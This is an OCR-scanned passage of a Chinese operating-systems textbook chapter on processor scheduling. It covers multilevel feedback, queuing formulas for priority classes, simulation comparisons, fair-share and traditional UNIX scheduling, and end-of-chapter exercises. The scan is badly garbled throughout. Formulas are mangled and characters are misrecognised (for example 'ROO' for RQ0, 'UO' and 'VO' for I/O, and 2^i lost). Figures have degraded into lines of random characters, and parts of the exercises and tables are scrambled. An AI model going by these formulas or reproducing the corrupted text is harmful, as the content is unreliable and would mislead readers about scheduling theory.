该 简单 方案 存在 的 一 个 问题 是 长 进程 的 周转 时 间 可 能 惊人 地 增加 。 事实 上 , 如 果 频 繁 地 有 新 
作业 进入 系统 ,就 有 可 能 出 现 饥饿 的 情况 。 为 补偿 这 一 点 ,可 以 按照 队列 改变 抢占 次 数 : 从 ROO 
中 调度 的 进程 允许 执行 一 个 时 间 单 位 ， 然 后 被 抢占 ; 从 RQ1 中 调度 的 进程 允许 执行 两 个 时 间 单 
位 等 。 一 般 而 言 ， 从 RQi 中 调度 的 进程 允许 执行 2 的 时 间 ， 然 后 才 被 抢占 。 该 方案 也 在 图 9.5 
和 表 9.5 的 例子 中 得 到 了 说 明 。 


晶 ”虚线 用 于 强调 这 是 一 个 时 序 图 ， 而 不 是 像 图 9.4 那样 静态 地 描述 可 能 的 转换 。 
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即使 给 较 低 的 优先 级 分 配 较 长 的 时 间 , 长 进程 仍然 有 可 能 饥饿 。 一 种 可 能 的 补救 方法 是 当 一 
个 进程 在 它 的 当前 队列 中 等 待 服务 的 时 间 超 过 一 定 的 时 间 量 后 ,把 它 提升 到 一 个 优先 级 较 高 的 队 
列 中 。 


9.2.4 性能 比较 


显然 , 各 种 调度 策略 的 性 能 是 选择 调度 策略 的 一 个 关键 因素 。 但 是 由 于 相关 的 性 能 取决 于 各 
种 各 样 的 因素 ， 包 括 各 种 进程 的 服务 时 间 分 布 、 调 度 的 效率 、 上 下 文 切换 机 制 、UO 请 求 的 本 质 
和 VO 子 系统 的 性 能 ,因而 不 可 能 得 到 明确 的 比较 结果 。 然 而 ,可 以 试图 通过 以 下 分 析 得 出 一 些 
通用 的 结论 。 
排队 分 析 
在 本 节 中 ， 采 用 了 基本 的 排队 公式 ,并 假设 了 泊 松 到 达 速 率 和 指数 服务 时 间 9。 
首先 可 以 观察 到 ， 下 一 个 被 服务 项 的 选择 与 服务 时 间 无 关 的 任何 调度 原则 都 遵循 以 下 关系 : 
1 
I-p 


AS 


其 中 ， 

T,: 周转 时 间或 驻 留 时 间 ; 在 系统 中 的 时 间 、 等 待 时 间 加 上 执行 时 间 的 总 和 。 

T: 平均 服务 时 间 ; 在 运行 状态 的 平均 时 间 。 

p: 处 理 器 的 利用 率 。 

特别 地 ,对 于 一 个 基于 优先 级 的 调度 程序 ,如 果 每 个 进程 优先 级 的 指定 与 预计 服务 时 间 无 关 ， 
则 提供 了 与 FCFS 原则 相同 的 平均 周转 时 间 和 平均 归 一 化 的 周转 时 间 。 此 外 , 抢占 存在 与 否 对 这 
些 平 均值 没有 影响 。 

除了 轮转 法 和 FCFS， 到 此 为 止 考 虑 的 各 种 调度 原则 都 是 基于 预计 服务 时 间 进 行 选择 的 。 遗 
憾 的 是 , 很 难为 这 些 原 则 开发 分 析 模 型 。 但 是 , 通过 考查 优先 级 基于 服务 时 间 的 优先 级 调度 ， 可 
以 获得 关于 这 类 调度 算法 与 FCFS 相 比 较 的 相对 性 能 。 

如 果 调 度 基 于 优先 级 来 完成 并 且 如 果 进 程 基 于 服务 时 间 被 指定 到 一 个 优先 级 类 ,就 会 出 现 差 
别 。 表 9.6 给 出 了 当 假设 有 两 种 优先 级 类 、 每 个 类 有 不 同 的 服务 时 间 的 时 候 产 生 的 公式 。 在 该 表 
中 ， 和 表示 到 达 率 。 这 些 结果 可 以 推广 到 任何 数目 的 优先 级 类 中 。 注 意 ， 抢 占 式 调度 和 非 抢占 式 调 
度 的 公式 是 不 同 的 。 对 于 后 一 种 情况 ,假设 当 一 个 高 优先 级 进程 就 绪 时 ， 低 优先 级 进程 立即 被 中 断 。 


RIG 包含 两 种 优先 级 类 别 的 单 服务 器 队列 的 公式 


. 泊 松 到 达 率 

. 优先 级 为 1 的 项 在 优先 级 为 2 的 项 之 前 得 到 服务 
.优先 级 相同 的 项 按 先 进 先 出 的 原则 调度 

.任何 项 不 会 在 被 服务 时 被 中 断 
.任何 项 不 会 离开 队列 ( 未 接 通 延迟 ) 


n e w N- 


a) 一 般 公式 
A=A+A, 

Pi =ATo; Pa = AT 2 
P=pPitpr 


A A 
T, = 一 有 + 一 人 3 
A sl A E 
A Az 
T, =£ Ta +T, 
anta 


O ”本章 用 到 的 排队 技术 的 术语 在 附录 OB 中 给 出 总 结 。 泊 松 到 达 实 质 上 就 是 随机 到 达 , 附录 9B 中 将 会 详细 解释 。 
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( # ) 

b) 无 中 断 ; 指 数 服 务 时 间 C) 抢占 -恢复 排队 原则 ; 指数 服务 时 间 
Ta + paT Ta = Ty 4 2 
1-2, p! 3 1-A 


Ta -Ta 1 pT, 
Ts=T2+ i 3 
2=Ty2 ig Tra Ta + (oma } 


Ty = 了 et 十 














作为 一 个 例子 , 考虑 两 种 优先 级 类 的 情况 , 每 个 类 中 进程 到 达 的 数目 相同 , 并且 低 优先 级 类 
的 平均 服务 时 间 是 高 优先 级 类 的 5 售 。 因 此 ， 希望 能 优先 选择 短 进程 。 图 9.11 给 出 了 全 部 结果 。 
通过 优先 选择 短 作业 ,在 较 高 的 利用 率 的 基础 上 ， 提 高 了 平均 均一 化 周转 时 间 , 可 以 想象 ， 如 果 
使 用 抢占 ,将 使 这 种 提高 达到 最 大 。 但 是 要 注意 ， 整 体 性 能 并 没有 受到 太 多 的 影响 。 












CRE TLC hi enero mn Po 
oft Oe eee tee ee a eT | 
awn i FORE Sl: A: PA as A ee 
se ae, 
Coo oe Pe er at tt ee 
F oa son a a he a 
E 
区 6 fee od Ss a Se De ee ae ee 
= f| 
E Gio Os SU tt A sa a 
S ET 
j ee a ee 
q ， re et A ee Tr 
Se A Sn ON EO 大 
ee er | : m 
E tt ee 
won mee \ 
i CIEE a T r 
E Sey Oke WSR E | 
0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0 


WAR Cp) 
图 9.11 整体 归 一 化 响应 时 间 


但 是 ， 当 分 别 考虑 两 个 优先 级 类 时 就 会 出 现 较 大 的 差别 。 图 9.12 显示 了 高 优先 级 短 进程 的 
结果 。 为 了 比较 , 图 中 上 面 一 条 线 假设 没有 使 用 优先 级 , 并 且 假 设 仅仅 是 查看 当 有 一 半 进 程 具有 
较 短 的 处 理 时 间 时 的 相对 性 能 , 其 余 两 条 线 假设 这 些 进程 被 指定 较 高 的 优先 级 。 当 系统 使 用 没有 
抢占 的 优先 级 调度 时 ， 性 能 提高 非常 显著 ， 当 使 用 了 抢占 时 更 是 如 此 。 

图 9.13 给 出 了 关于 低 优先 级 长 进程 的 相同 分 析 。 正 如 所 预料 的 那样 ， 这 类 进程 在 优先 级 调 
度 策略 下 性 能 会 下 降 。 
仿真 建 模 | 

通过 使 用 离散 事件 仿真 可 以 解决 建 模 分 析 的 某 些 问题 , 它 可 以 对 许多 策略 建立 模型 。 仿真 的 
缺点 是 一 个 给 定 “ 运 行 ”的 结果 只 适用 于 特定 假设 下 的 特定 进 炉 集合。 尽管 如 此 , 仍然 可 以 得 到 
有 用 的 观察 结果 。 

[ FINK88 ] 中 给 出 了 这 类 研究 的 结果 。 仿真 包含 了 50 000 个 进程 ， 到 达 速 率 4=0.8, 平均 服 
务 时 间 T=1。 因 此 , 假设 处 理 器 的 利用 率 为 p= 47,=0.8。 注 意 ， 这 仅仅 测试 一 种 利用 率 。 

为 了 表示 结果 ,进程 按照 服务 时 间 的 百分比 进行 分 组 , 每 一 组 有 500 个 进程 。 因此， 服务 时 
间 最 短 的 500 个 进程 在 第 一 个 百分点 中 , 除去 它们 以 外 , 剩 下 的 进程 中 服务 时 间 最 短 的 500: 个 进 
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程 在 第 2 个 百分点 中 ; 依次 类 推 。 这 就 可 以 把 各 种 策略 的 结果 看 做 是 关于 进程 长 度 的 函数 。 


归 一 化 响应 时 间 《TyTa1) 
DTT LT | 


CCN 





02 #03 04 05 06 07 08 09 1.0 
使 用 率 (p) 


图 9.12 短 进程 的 归 一 化 响应 时 间 


轨 一 化 咏 应 时 间 Tana) 


0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0 
使 用 率 (p) 


图 9.13 ”长 进程 的 归 一 化 响应 时 间 


图 9.14 给 出 了 归 一 化 周转 时 间 ,图 9.15 给 出 了 平均 等 待 时 间 。 查 看 周转 时 间 ,可 以 看 到 FCFS 
的 性 能 非常 不 好 ， 三 分 之 一 的 进程 归 一 化 周转 时 间 超 过 服务 时 间 的 10 倍 ， 并 且 这 些 都 是 最 短 的 
进程 ; 另 一 方面 ， 因 为 FCFS 的 调度 与 服务 时 间 无 关 ， 其 绝对 等 待 时 间 始 终 是 一 致 的 。 这 两 个 图 
显示 了 时 间 片 为 一 个 时 间 单 位 的 轮转 法 。 除 了 执行 时 间 小 于 一 个 时 间 片 的 最 短 进 程 ,轮转 法 ( RR ) 
对 所 有 进程 所 产生 的 标准 周转 时 间 大 约 为 5， 公 平地 对 待 所 有 进程 。 除 了 最 短 进 程 ， 最 短 进程 
(SPN) 法 的 执行 结果 比 轮转 法 好 。 最 短 剩 余 时 间 法 (SRT) BAAR ASH SPN, 除了 7% 的 
最 长 进程 , 它 的 执行 效率 比 SPN 好 。 可 以 看 出 , 在 所 有 的 非 抢占 策略 中 , FCFS 偏向 长 进程 , SPN 
偏向 短 进程 。 最 高 响应 比 (HRRN ) 是 这 两 种 结果 的 折 中 ， 这 一 点 在 图 中 得 到 了 证 实 。 最 后 ， 该 
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图 给 出 了 在 每 个 优先 级 队列 中 具有 固定 的 统一 时 间 片 的 反馈 调度 。 正如 所 预料 的 那样 , 对 于 短 进 
程 ，FB 的 执行 结果 非常 好 。 





所 需要 的 时 间 百 分 点 
图 9.14 关于 归 一 化 周转 时 间 的 仿真 结果 





等 待 时 间 
or N Uù Aà ù A oo YO 


0 10 20 30 40 sO 60 70 80 9% 10 
所 需要 的 时 间 百 分 点 


图 9.15 关于 等 待 时 间 的 模拟 结果 


925 ”公平 共享 调度 

到 此 为 止 讲 述 的 所 有 调度 算法 都 是 把 就 绪 进 程 集合 看 做 是 单一 的 进程 池 , 从 这 个 进程 池 中 选 
择 下 一 个 要 运行 的 进程 。 虽然 该 池 可 以 按 优先 级 划分 成 几 个 ,但 它们 都 是 同 构 的 。 

但 是 ， 在 多 用 户 系统 中 ,如 果 单 个 用 户 的 应 用 程序 或 作业 可 以 组 成 多 个 进程 (或 线程 )， 就 
会 出 现 传统 的 调度 程序 不 认识 的 进程 集合 结构 。 从 用 户 的 角度 看 , 他 所 关心 的 不 是 某 个 特定 的 进 
程 如 何 执行 ,而 是 构成 应 用 程序 的 一 组 进程 如 何 执行 。 因 此 , 基于 进程 组 的 调度 策略 是 非常 具有 
吸引 力 的 , 该 方法 通常 称 做 公平 共享 调度 ( fair-share scheduling )。 此 外 ， 即 使 每 个 用 户 用 一 个 进 
程 表示 ， 这 个 概念 可 以 扩展 到 用 户 组 。 例 如 ,在 分 时 系统 中 , 可 能 希望 把 某 个 部 门 的 所 有 用 户 看 
做 是 同一 个 组 中 的 成 员 , 然后 进行 调度 决策 ,并 给 每 个 组 中 的 用 户 提供 相同 的 服务 。 因 此 ， 如果 
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同一 个 部 门 中 的 大 量 用 户 登 录 到 系统 , 则 希望 响应 时 间 效 果 的 降低 主要 影响 到 该 部 门 的 成 员 , 而 
不 会 影响 其 他 部 门 的 用 户 。 

术语 “公平 共享 ”表明 了 这 类 调度 程序 的 基本 原则 。 每 个 用 户 被 指定 了 某 种 类 型 的 权 值 ， 该 
权 值 定义 了 该 用 户 对 系统 资源 的 共享 , 而 且 是 作为 在 所 有 使 用 的 资源 中 所 占 的 比例 来 体现 。 特 别 
地 ， 每 个 用 户 被 分 配 了 处 理 器 的 共享 。 这 种 方案 或 多 或 少 以 线性 的 方式 操作 ， 如 果 用 户 A 的 权 
值 是 用 户 B 的 2 倍 ， 那么 从 长 期 运行 的 结果 来 看 ， 用 户 A 可 以 完成 的 工作 应 该 是 用 户 B 的 2 FF, 
公平 共享 调度 程序 的 目标 是 监视 使 用 情况 ， 对 那些 相对 于 公平 共享 的 用 户 占有 较 多 资源 的 用 户 ， 调 
度 程序 分 配 以 较 少 的 资源 ， 相 对 于 公平 共享 的 用 户 占 有 较 少 资源 的 用 户 ， 调 度 程序 分 配 以 较 多 的 
资源 。 

关于 公平 共享 调度 程序 有 许多 方法 [ HENR84, KAY88, WOOD86 J, 本 节 将 讲述 在 [ HENR84 ] 
中 提出 并 在 许多 UNIX 系统 中 实现 的 方案 。 该 方案 被 简单 地 称 为 公平 共享 调度 程序 ( Fair-Share 
Scheduler, FSS), FSS 在 进行 调度 决策 时 ， 需 要 考虑 相关 进程 组 的 执行 历史 以 及 每 个 进程 的 单 
个 执行 历史 。 系统 把 用 户 团体 划分 成 一 些 公平 共享 组 , 并 给 每 个 组 分 配 一 部 分 处 理 器 资源 。 因 此 ， 
可 能 会 有 4 个 组 ,每 个 组 可 以 使 用 25% 的 处 理 器 。 实 际 上 是 给 每 个 公平 共享 组 提供 了 一 个 虚拟 
系统 ， 虚 拟 系统 的 运行 速度 按照 比例 慢 于 整个 系统 。 

调度 是 基于 优先 级 的 , 它 考 虑 了 进程 的 基础 优先 级 、 近 期 使 用 处 理 器 的 情况 以 及 进程 所 在 的 
组 近期 使 用 处 理 器 的 情况 。 优 先 级 的 数字 值 越 大 ， 表 示 的 优先 级 越 低 。 下 面 的 公式 可 用 于 组 大 





CPU) = FED 

GPU, (i) = SED 

P; (i) = Base; CPU GCPU,;(i) 
2 4AxW, 


其 中 ， 
CPU(i): 进程 j 在 时 间 区 间 i 中 处 理 器 使 用 情况 的 度量 。 
GCPU(i): 组 天 在 时 间 区 间 i 中 处 理 器 使 用 情况 的 度量 。 
Pi): 进程 j 在 时 间 区 间 i 开始 处 的 优先 级 ; 值 越 小 表示 的 优先 级 越 高 。 
Base;: 进程 j 的 基础 优先 级 。 
Wi: 分 配给 组 大 的 权 值 ， 且 具有 如 下 约束 : 0m1 和》W=1。 
k 


每 个 进程 被 分 配 了 一 个 基本 的 优先 级 ,该 进程 的 优先 级 随 着 进程 使 用 处 理 器 以 及 当 该 进程 所 
在 的 组 使 用 处 理 器 而 降低 。 对 于 进程 组 使 用 的 情况 , 通过 用 平均 值 除 以 该 组 的 权 值 进行 平均 值 的 
归 一 化 。 分 配给 某 个 组 的 权 值 越 大 ， 那 么 该 组 使 用 处 理 器 对 其 优先 级 的 影响 就 越 小 。 

在 图 9.16 的 例子 中 ,进程 A 在 一 个 组 中 ,进程 B 和 进程 C 在 第 二 个 组 中 , 每 个 组 的 权 值 为 
0.5。 假设 所 有 进程 都 是 处 理 器 密集 型 的 , 并 且 通 常 处 于 就 绪 状 态 。 所 有 进程 的 基本 优先 级 为 60， 
处 理 器 的 使 用 按 以 下 方式 度量 : 处 理 器 每 秒 被 中 断 60 次 ， 在 每 次 中 断 过 程 中 ， 当 前 正在 运行 的 
进程 的 处 理 器 使 用 域 增 1， 相 应 的 组 的 处 理 器 使 用 域 也 增 1， 并 且 每 秒 都 重新 计算 优先 级 。 

在 该 图 中 ， 首 先 调度 进程 A。 第 1 秒 结 束 时 ， 它 被 抢占 。 此 时 进程 B 和 C 具有 最 高 优先 级 ， 
进程 B 被 调度 。 在 第 2 个 时 间 单 位 结束 时 ， 进 程 A 具有 最 高 优先 级 。 注 意 该 模式 是 重复 的 ， 内 
核 按 下 面 顺序 调度 进程 , A、B、A、C、A、B 等 。 因 此 ， 处 理 器 的 50% 分 配给 进程 A ( 进程 A 
构成 一 个 组 )，50% 分 配给 进程 B 和 进程 C (进程 B 和 进程 C 构成 另 一 个 组 )。 
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进程 A 进程 B 进程 C 

进程 ”组 进程 A 进程 组 
时 间 CPU CPU CPU CPU CPU CPU 
优先 级 计数 ”计数 优先 级 计数 i 计数 计数 





组 1 
相对 白 一 些 的 矩形 表示 正在 执行 的 进程 
图 9.16 公平 共享 调度 程序 的 例子 ， 有 三 个 进程 两 个 组 


9.3 ”传统 的 UNIX 调度 


本 节 将 分 析 传 统 的 UNIX 调度 ，SVR3 和 4.3BSD UNIX 使 用 的 都 是 这 种 调度 方案 。 这 些 系统 
主要 用 于 分 时 交互 环境 中 。 调 度 算法 设计 的 为 交互 用 户 提 供 好 的 响应 时 间 ， 同 时 保证 低 优先 级 的 后 
台 作 业 不 会 饥饿 。 尽 管 在 现代 UNIX 系统 中 ， 该 算法 已 经 被 取代 ， 但 是 这 种 方法 很 值得 研究 ， 因 为 
它 是 分 时 调度 算法 的 代表 。SVR4 的 调度 方案 包括 对 实时 要 求 的 适应 调节 , 因此 推迟 到 第 10 章 讲 述 。 

传统 的 UNIX 调度 程序 采用 了 多 级 反馈 , 而 在 每 个 优先 级 队列 中 采用 了 轮转 的 方法 。 该 系统 
使 用 1 秒 抢占 方式 ,也 就 是 说 ， 如 果 一 个 正在 运行 的 进程 在 1 秒 内 没有 被 阻塞 或 完成 ， 它 将 被 抢 
占 。 优 先 级 基于 进程 类 型 和 执行 历史 。 可 应 用 下 面 的 公式 : 


CPU ,(i) = CPU. i. -1) 


P,(i) = Base; + POO + nice 


其 中 ， 
CPU): 进程 j 在 区 间 i 中 处 理 器 使 用 情况 的 度量 。 
Pd): 进程 /在 区 间 i 开始 处 的 优先 级 ，; 值 越 小 表示 的 优先 级 越 高 。 
Base;: 进程 j 的 基本 优先 级 。 
nice; 用 户 可 控制 的 调节 因子 。 
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每 秒 都 重新 计算 每 个 进程 的 优先 级 , 并 且 进 行 一 次 新 的 调度 决策 。 给 每 个 进程 赋予 基本 优先 
级 的 目的 是 把 所 有 的 进程 划分 成 固定 的 优先 级 区 。CPU 和 nice 组 件 是 被 限制 的 ， 以 防止 进程 迁 
移出 指定 的 区 ( 由 基本 优先 级 指定 )。 这 些 区 用 于 优化 对 块 设 备 (如 磁盘 ) 的 访问 并 且 允 许 操 作 
系统 迅速 响应 系统 调用 。 按 优先 级 递减 的 顺序 ， 这 些 区 包括 : 交换 程序 、 块 WO 设备 控制 、 人 
操作 、 字 符 IO 设备 控制 、 用 户 进程 。 

这 个 层次 结构 提供 对 IO 设备 最 有 效 的 使 用 。 在 用 户 进程 区 ,使 用 执行 历史 可 以 用 IO 密集 
型 的 进程 来 处 罚 处 理 器 密集 型 的 进程 。 同样 , 这 会 提高 效率 。 这 个 调度 策略 和 轮转 抢 三 策略 结合 
使 用 ,来 满足 通用 的 分 时 要 求 。 

图 9.17 给 出 了 一 个 进程 调度 的 例子 。 进 程 A、B 和 C 被 同时 创建 ， 基 本 优先 级 为 60 (忽略 
nice 值 )。 时 钟 中 断 每 秒 发 生 60 次 ， 每 次 中 渐 时 对 正在 运行 的 进程 的 计数 器 加 1。 这 个 例子 假设 
没有 进程 会 阻塞 自己 ， 并 且 没 有 其 他 进程 准备 运行 。 请 与 图 9.16 对 照 。 


进程 A 进程 了 进程 C 
优先 级 ”CPU 计数 ”优先 级 。 CpU 计数 ”优先 级 CPU 计数 





相对 白 一 些 的 矩形 表示 正在 执行 的 进程 
图 9.17 传统 的 UNIX 进程 调度 例子 


9.4 小 结 


操作 系统 根据 进程 的 执行 对 三 种 类 型 的 调度 方案 做 出 选择 。 长 程 调度 确定 何 时 允许 一 个 新 进 
程 进入 系统 。 中 程 调 度 是 交换 功能 的 一 部 分 , 它 确定 何 时 把 一 个 程序 的 部 分 或 全 部 取 进 内 存 , 使 
得 该 程序 能 够 被 执行 。 短程 调度 确定 哪 一 个 就 绪 进 程 下 一 Ts 本 章 集 中 讨论 与 短程 
调度 相关 的 问题 。 3 
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在 设计 短程 调度 程序 时 使 用 了 各 种 各 样 的 准则 。 一 些 准则 与 单个 用 户 觉察 到 的 系统 行为 有 关 


( 面向 用 户 )， 而 其 他 准则 查看 系统 在 满足 所 有 用 户 的 需求 时 的 总 效率 ( 面向 系统 )。 一 些 准则 与 
性 能 的 定量 度量 有 关 ， 另 一 些 在 本 质 上 是 定性 的 。 从 用 户 的 角度 看 , 响应 时 间 通 常 是 系统 最 重要 


的 一 


个 特性 ; 从 系统 的 角度 看 ， 吞 吐 量 或 处 理 器 利用 率 是 最 重要 的 。 

为 所 有 就 绪 进程 的 短程 调度 决策 已 经 开发 许多 种 算法 : 

e 先 来 先 服务 : 选择 等 待 服务 时 间 最 长 的 进程 。 

@ 轮转 : 使 用 时 间 片 限制 任何 正在 运行 的 进程 只 能 使 用 一 段 处 理 器 时 间 ， 并 在 所 有 就 绪 进 
程 中 轮转 。 

@ 最 短 进程 优先 : 选择 预期 处 理 时 间 最 短 的 进程 ， 并 且 不 抢占 该 进程 。 

@ 最 短 剩 余 时 间 : 选择 预期 的 剩余 处 理 时 间 最 短 的 进程 。 当 另 一 个 进程 就 缮 时 ， 这 个 进程 
可 能 会 被 抢占 。 

@ 最 高 响应 比 优先 : 调度 决策 基于 对 归 一 化 周转 时 间 的 估计 。 

@ Rik: 建立 一 组 调度 队列 ， 基 于 每 个 进程 的 执行 历史 和 其 他 一 些 准 则 ， 把 它们 分 配 到 各 
个 队列 中 。 

调度 算法 的 选择 取决 于 预期 的 性 能 和 实现 的 复杂 度 。 


9.5 ”推荐 读物 


基本 上 所 有 的 操作 系统 教材 都 涉及 了 调度 。 在 [KLEI04] 和 [CONW67] 中 有 对 各 种 调度 策略 的 严格 的 排 


队 分 析 。[DOWD93] 对 各 种 调度 算法 有 指导 性 的 性 能 分 析 。 


CONW67 Conway, R.; Maxwell, W.; and Miller, L. Theroy of Scheduling. Reading, MA:Addison-Wesley, 


1967.Reprinted by Dover Publicatios,2003. 


DOWD93 Dowdy, L., and Lowery, C. PS to Operating Systems. Upper Saddle River, NJ: Prentice Hall, 


1993. 


KLEI04 Kleinrock, L. Queuing System, Volume Three: Computer Applications. New York: Wiley, 2004. 


96 ”关键 术语 、 复 习题 和 习题 
关键 术语 


到 达 速 率 长 程 调 度 程序 服务 时 间 分 派 程序 

中 程 调度 程序 短程 调度 程序 指数 平均 多 级 反馈 队列 

吞吐 量 公平 共享 调度 可 预测 性 时 间 片 

公平 性 驻 留 时 间 周转 时 间 (TAT ) 先 来 先 服 务 (FCFS) 
响应 时 间 利用 率 先进 先 出 (FIFO ) 轮转 

等 待 时 间 调度 优先 级 





复习 题 


9.1 
9.2 
9.3 
9.4 
9.5 
9.6 
9.7 
9.8 


简要 描述 三 种 类 型 的 处 理 器 调度 。 

在 交互 式 操作 系统 中 ,通常 最 重要 的 性 能 要 求 是 什么 ? 

周转 时 间 和 响应 时 间 有 什么 区 别 ? 

对 于 进程 调度 ， 较 小 的 优先 级 值 表示 较 低 的 优先 级 还 是 较 高 的 优先 级 ? 
抢占 式 和 非 抢占 式 调度 有 什么 区 别 ? 

简单 定义 FCFS 调度 。 

简单 定义 轮转 调度 。 

简单 定义 最 短 进 程 优先 调度 。 
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9.9 
9.10 
9.11 





简单 定义 最 短 剩余 时 间 调 度 。 
简单 定义 最 高 响应 比 优先 调度 。 
简单 定义 反馈 调度 。 


习题 


9.1 


9.2 


9.3 


9.4 


9.5 


9.6 


9.7 


9.8 


9.9 


9.10 


考虑 下 面 的 进程 集合 : 


进程 名 到 达 时 间 处 理 时 间 
A 


0 
1 
3 
9 


moa 
AW nd ww 


12 


对 这 个 集合 ， 给 出 类 似 于 表 IS 和 图 9.5 的 分 析 。 
按 习 题 9.1 的 要 求 完 成 下 面 的 集合 : 


进程 名 到 达 时 间 处 理 时 间 
A 0 1 
B 1 9 
C 2 1 
D 3 9 





证 明 在 非 抢 占 式 调度 算法 中 ,对 于 同时 到 达 的 批 处 理 作业 ，SPN 提供 了 最 小 平均 等 待 时 间 。 假设 调 度 
程序 只 要 有 任务 就 必须 执行 。 
假设 一 个 进程 的 每 一 次 瞬间 的 执行 时 间 〈burst-time 模式 ) 为 6，4，6，4，13，13，13， 假 设 最 初 的 
猜测 值 为 10。 请 画 出 类 似 于 图 9.9 HAR. 
考虑 下 面 的 公式 ， 它 可 以 蔡 代 公 式 〈9.3 ): 
Sy = @T, +(1-@)S, 
Xn = min[Ubound,max[ Lbound,(BS,.4)]) 
其 中 Ubound fil Lbound WAM ATA TA LRA PR. Xr 的 值 用 于 最 短 进程 优先 的 算法 ,并 
且 可 以 代替 Sio AM BATA. 它们 每 个 取 最 大 和 最 小 值 会 产生 什么 影响 ? 
在 图 9.5 下 面 的 例子 中 , 在 控制 权限 转移 到 B 之 前 ,进程 A 运行 2 个 时 间 单 元 , 另外 一 个 场景 是 在 控 
制 权 限 转移 到 B 之 前 , 进程 A 运行 3 个 时 间 单 元 。 在 反馈 调度 算法 中 , 这 两 种 场景 的 策略 有 什么 不 同 ? 
在 一 个 非 抢占 的 单 处 理 器 系统 中 ， 在 刚刚 完成 一 个 作业 后 的 时 刻 :， 就 绪 队 列 中 包含 三 个 作业 。 这 些 
作业 分 别 在 时 刻 #、 二 和 处 到 达 ， 估 计 执 行 时间 分 别 为 r rA rs Æ 9.18 显示 了 它们 的 响应 比 随 
着 时 间 线 性 增加 。 使 用 这 个 例子 , 设计 一 种 响应 比 调度 的 变 体 ， 称 为 极 小 极 大 响应 比 调度 算法 ， 它 可 
以 使 给 定 的 一 批 作业 (忽略 后 来 到 达 的 ) 的 最 大 响应 比 最 小 。( 提示 : 首先 确定 最 后 调度 哪 一 个 作业 。) 
证 明 ， 对 给 定 的 一 批 作业 ， 上 一 习题 中 的 最 大 响应 比 调度 算法 能 够 使 它们 的 最 大 响应 时 间 最 小 。( 提 
R: 重点 研究 达到 最 高 响应 比 的 作业 ， 以 及 在 它 之 前 执行 的 所 有 作业 。 考 虑 同样 的 作业 子 集 ， 按 任何 
其 他 顺序 调度 ， 观 察 最 后 一 个 执行 的 作业 的 响应 比 。 注 意 ， 这 个 子 集 现 在 可 能 混合 了 全 集中 的 其 他 作 
Ako) 
驻 留 时 间 7 被 定义 成 一 个 进程 花费 在 等 待 和 被 服务 上 的 总 的 平均 时 间 。 说 明 对 FIFO， 若 平均 服务 时 
la T, WA T=7s/(1-p)， 其 中 p 为 利用 率 。 
假设 一 个 处 理 器 被 就 绪 队 列 中 的 所 有 进程 以 无 限 的 速度 多 路 复 用 ， 旦 没有 任何 额外 的 开销 。( 这 是 一 
个 在 就 绪 进 程 中 使 用 轮转 调度 的 理想 模型 ， 时间 片 相 对 于 平均 服务 时 间 非 常 小 。) 说 明 对 来 自 一 个 指 
数 服务 时 间 的 无 限 源 的 泊 松 输入 ,一 个 进程 的 平均 响应 时 间 RR 和 服务 时 间 x 由 式 R=x/(1-p ) 给 出 ( 提 
示 : 复习 在 WilliamStallings.com/StudentSupport.html 上 排队 分 析 文 档 中 的 基本 排队 公式 。 然 后 考虑 
当 一 个 给 定 进程 到 达 时 ， 系 统 中 等 待 项 的 数目 w )。 





9.11 


9.12 


9.13 


”是 进程 切换 时 间 ) 的 部 分 时 间 与 总 时 间 的 
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对 某 一 系统 的 度量 结果 表明 : 在 一 个 进程 由 于 VO 而 阻塞 前 ， 其 平均 运行 时 间 为 T。 在 时 间 段 工 中 ， 
进程 切换 的 开销 为 S。 换 句 话说 , T 包 括 了 
在 CPU 上 进程 切换 的 开销 ， 且 S<T。 如 果 
采用 轮转 调度 策略 ， 时 间 配 额 为 Q， 针 对 
以 下 三 种 状况 ,给 出 相应 的 CPU 效率 计算 
公式 .CPU 效率 是 指 CPU 执行 用 户 代 码 ( 不 


响应 比 





之 比 。 
a) Q>T tı h h A 

b) QS ji 

c) Q 接近 0 图 9.18 ”响应 比 关 于 时 间 的 函数 

在 排队 系统 中 ， 新 作业 在 得 到 服务 之 前 必须 等 待 一 小 段 时 间 。 当 一 个 作业 等 待 时 ， 它 的 优先 级 从 0 
开始 以 速度 线性 增加 。 一 个 作业 一 直 等 待 到 它 的 优先 级 达到 正在 接收 服务 的 作业 的 优先 级 ， 然 后 
它 开 始 与 其 他 正在 接收 服务 的 作业 使 用 轮转 法 平等 地 共享 处 理 器 ， 与 此 同时 ， 它 的 优先 级 继续 以 比 
较 人 慢 的 速度 [ 峭 长 。 这 个 算法 称 做 自私 轮转 法 ， 因 为 在 接收 服务 的 作业 试图 ( 徒然 ) 通过 不 断 地 增加 
它 的 优先 级 来 垄断 处 理 器 。 使 用 图 9.19 说 明 服 务 时 间 为 x 的 一 个 作业 的 平均 响应 时 间 RR 为 


S xes 
+ 








R, = - 
-P 


1 1 
p=As p'=o(1-£) O0<f<a 


假设 到 达 时 间 和 服务 时 间 分 别 以 均值 1/4 和 s BRA (A: 分 别 考虑 整个 系统 和 两 个 子 系统 )。 


-=P 






正在 等 待 的 作业 被 服务 的 作业 


优先 级 





图 9.19 ”自私 轮转 法 


四 个 进程 的 需求 特征 如 下 表 所 示 。 这 些 进程 准备 在 一 个 仅 有 简单 VO 处 理 设备 的 单 处 理 机 上 执行 。 
在 该 系统 中 ,分 派 一 个 进程 到 CPU 上 执行 的 开销 是 1 个 时 间 单 位 ,将 进程 从 CPU 上 移 除 的 开销 为 0。 
在 LO 设备 上 操作 一 个 进程 的 开销 为 0， 该 系统 采用 轮转 调度 策略 ， 时 间 配 额 为 5 个 单位 。 

a) 两 个 时 间 关 系 图 (一 个 关于 CPU， 一 个 关于 IO 设备 )， 描 述 了 执行 顺序 

b ) TR = 平均 进程 周转 时 间 

c) CPU-UTIL = CPU 利用 率 ( CPU 处 于 繁忙 的 时 间 / 总 时 间 ) 

d) IO-UTIL = VO 设备 利用 率 (VO 设备 处 于 繁忙 的 时 间 / 总 时 间 ) 

假设 每 一 个 IO 请 求 ( 如 果 有 VO HR) 都 在 CPU 运行 之 前 执行 ,并 假设 VO 操作 从 不 被 抢占 。 











进 程 号 到 达 时 间 CPU 进发 时 间 1 MO 进发 时 间 CPU 进发 时 间 2 
P1 0 5 5 2 
P2 3-€ 2 22 2 
P3 7-e 8 0 0 
P4 25-€ 9 2 1 





